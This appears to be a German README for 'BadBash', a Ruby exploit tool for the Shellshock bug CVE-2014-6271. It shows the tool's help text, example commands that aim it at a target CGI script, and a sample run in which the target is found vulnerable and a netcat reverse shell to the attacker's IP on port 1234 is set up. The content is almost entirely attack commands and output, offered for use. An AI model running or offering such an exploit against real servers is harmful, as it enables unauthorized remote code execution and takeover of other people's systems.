
CVE-2014-6271 RCE tool
BadBash ist ein Exploit-Tool für CVE-2014-6271 (RCE). Die Basisversion überprüft nur die HTTP-CGI-Seite und stellt lediglich eine netcat-Reverse-Shell auf Port 1234 bereit.
Entwickler : Andy Yang Version : 0.1.0 Lizenz : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - CVE-2014-6271 RCE-Tool von Andy Yang Basisversion überprüft nur die HTTP-Seite Basisversion stellt lediglich eine netcat-Reverse-Shell auf Port 1234 bereit
BEISPIELVERWENDUNG:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI-Pfad Vollständiger Pfad der CGI-Seite
-d, --Ziel-IP Ihre IP-Adresse, die auf eine eingehende Verbindung wartet
-h, --help Hilfe anzeigen
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Überprüfe, ob das Ziel verwundbar ist ........
[Info] Dies kann bis zu 10 Sekunden dauern ........
[Info] Ziel ist verwundbar!!!
[Info] Bitte verwenden Sie NC, um auf Port 1234 für die Reverse-Shell zu lauschen..........
[Info] Exploit für eine Reverse-Shell, um 172.16.189.1:1234 über netcat zu verbinden ..........